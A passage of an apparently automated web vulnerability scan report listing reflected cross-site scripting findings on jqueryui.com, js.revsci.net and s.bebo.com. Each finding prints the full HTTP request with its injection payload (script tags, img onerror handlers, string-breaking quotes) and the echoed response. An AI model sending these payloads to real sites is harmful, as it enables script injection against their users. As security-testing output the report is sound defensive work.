</script>1ac0e87e35d&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px7c65d"><script>alert(1)</script>1ac0e87e35d&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.81. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d9b9"><script>alert(1)</script>4b8fea3533e was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d9b9"><script>alert(1)</script>4b8fea3533e&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
xtureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d9b9"><script>alert(1)</script>4b8fea3533e&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

2.82. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 911fc"><script>alert(1)</script>3c6b3b13c15 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30911fc"><script>alert(1)</script>3c6b3b13c15&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30911fc"><script>alert(1)</script>3c6b3b13c15&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.83. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1d78"><script>alert(1)</script>e9417ff18c was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxb1d78"><script>alert(1)</script>e9417ff18c&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxb1d78"><script>alert(1)</script>e9417ff18c&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.84. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 6da49<script>alert(1)</script>f1f0690e9f was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K087846da49<script>alert(1)</script>f1f0690e9f HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 06 Jul 2011 14:00:48 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 07 Jul 2011 14:00:48 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:00:47 GMT
Content-Length: 127

/*
* JavaScript include error:
* The customer code "K087846DA49<SCRIPT>ALERT(1)</SCRIPT>F1F0690E9F" was not recognized.
*/

2.85. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef1cd"><img%20src%3da%20onerror%3dalert(1)>e91147b2c03 was submitted in the REST URL parameter 2. This input was echoed as ef1cd"><img src=a onerror=alert(1)>e91147b2c03 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/Siteef1cd"><img%20src%3da%20onerror%3dalert(1)>e91147b2c03/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14777
Date: Wed, 06 Jul 2011 11:22:11 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-siteef1cd"><img src=a onerror=alert(1)>e91147b2c03-_default" >
...[SNIP]...

2.86. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 292f7'><script>alert(1)</script>55c886dab8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/Site292f7'><script>alert(1)</script>55c886dab8f/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14694
Date: Wed, 06 Jul 2011 11:22:12 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/Site292f7'><script>alert(1)</script>55c886dab8f/_default_css&QueryString=fp%3D1a2476eab67e5bf239dcd12b6f63fb7f&Lang=nl'>
...[SNIP]...

2.87. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d56a'%3b4e37d154695 was submitted in the REST URL parameter 2. This input was echoed as 5d56a';4e37d154695 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/Site5d56a'%3b4e37d154695/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14483
Date: Wed, 06 Jul 2011 11:22:12 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
elem.tagName=='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/Site5d56a';4e37d154695/_default.css/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('
...[SNIP]...

2.88. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 18ffc<script>alert(1)</script>491fb71b12c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/Site18ffc<script>alert(1)</script>491fb71b12c/_default.css?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Vary: Accept-Encoding
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14676
Date: Wed, 06 Jul 2011 11:22:14 GMT
Connection: close
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/Site18ffc<script>alert(1)</script>491fb71b12c/_default.css page, please try again.</div>
...[SNIP]...

2.89. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d3141'><script>alert(1)</script>03a6132018e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/Site/_default.cssd3141'><script>alert(1)</script>03a6132018e?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14244
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<a href='/SwitchLanguage.jsp?Page=c/Site/_default_cssd3141'><script>alert(1)</script>03a6132018e&QueryString=fp%3D1a2476eab67e5bf239dcd12b6f63fb7f&Lang=nl'>
...[SNIP]...

2.90. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2df"><img%20src%3da%20onerror%3dalert(1)>11c0a48793f was submitted in the REST URL parameter 3. This input was echoed as af2df"><img src=a onerror=alert(1)>11c0a48793f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c/Site/af2df"><img%20src%3da%20onerror%3dalert(1)>11c0a48793f?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:16 GMT
Content-Length: 14267
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<body class="bebo_lang_us bebo_country_us layout_bebo800" id="c-site-af2df"><img src=a onerror=alert(1)>11c0a48793f" >
...[SNIP]...

2.91. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://s.bebo.com
Path:   /c/Site/_default.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4d42'%3b1c774af16d5 was submitted in the REST URL parameter 3. This input was echoed as a4d42';1c774af16d5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/Site/_default.cssa4d42'%3b1c774af16d5?fp=1a2476eab67e5bf239dcd12b6f63fb7f HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:17 GMT
Content-Length: 14081
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
='INPUT' && elem.type=='button'))) {if (elem.className && elem.id && elem.className.indexOf('gatrack')!=-1 ) {var elemIdent = elem.id.replace(/[^a-z0-9-]/g,'_');var trackingPath = '/_/Site/_default.cssa4d42';1c774af16d5/'+elemIdent;this._trackPageview(trackingPath);}}} catch(ignore){}}; var pageTracker1=_gat._getTracker('UA-246268-1');pageTracker1._setDomainName('.bebo.com');pageTracker1._setSampleRate('10');pageTrac
...[SNIP]...

2.92. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 87eb8<script>alert(1)</script>fda742dfacd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c/site87eb8<script>alert(1)</script>fda742dfacd/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Date: Wed, 06 Jul 2011 11:22:13 GMT
Content-Length: 14722
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
X-N: S


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/site87eb8<script>alert(1)</script>fda742dfacd/index20_script.js page, please try again.</div>
...[SNIP]...

2.93. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://s.bebo.com
Path:   /c/site/index20_script.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2d8f'%3b5319fe373f was submitted in the REST URL parameter 2. This input was echoed as b2d8f';5319fe373f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c/siteb2d8f'%3b5319fe373f/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
